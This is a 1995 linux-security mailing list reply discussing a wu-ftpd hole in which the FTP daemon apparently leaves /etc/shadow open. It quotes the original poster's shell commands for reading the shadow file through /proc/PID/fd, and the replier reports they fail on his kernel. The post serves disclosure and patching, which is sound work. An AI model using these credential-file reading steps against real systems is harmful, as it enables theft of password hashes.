[262] in linux-security and linux-alert archive
Re: Another problem with wu-ftpd (shadow)
daemon@ATHENA.MIT.EDU (Thomas Quinot)
Mon Jun 12 13:57:17 1995
To: linux-security@tarsier.cv.nrao.edu
From: thomas@melchior.frmug.fr.net (Thomas Quinot)
Date: 11 Jun 1995 11:14:26 GMT
Marek Michalkiewicz <marekm@i17linuxb.ists.pwr.wroc.pl> écrit :
> marekm@i17linuxa:~$ ps uwx
> marekm 15812 2.0 7.1 157 500 con S 15:09 0:00 -localhost: marekm: IDLE
> marekm 15816 0.0 3.1 64 224 pp4 R 15:10 0:00 ps uwx
> marekm@i17linuxa:~$ ls -al /proc/15812/fd
I cannot do that... (Permission denied) (Kernel is 1.2.9, vanilla as far as
/proc is concerned.)
> marekm@i17linuxa:~$ ls -i /etc/shadow
> 32007 /etc/shadow
> marekm@i17linuxa:~$ cat /proc/15812/fd/9
Even root gets nothing but a blank file here...
Nevertheless I applied your patch. Thanks !
--
Grand.Bwana@melchior.frmug.fr.net | Linux : the choice of a GNU generation
[Mod: Obviously there is some debate as to whether or how this hole
works. Please check it out if you have a setup that might be vulnerable
(i.e. you run both shadow and an "insecure" wu-ftpd binary) and then
direct all further correspondence regarding this to the author of the
post originally outlining the hole: Marek Michalkiewicz
<marekm@i17linuxb.ists.pwr.wroc.pl>. I'd like to ask him to please
summarize anything new that is uncovered. Thanks much! --Jeff.]
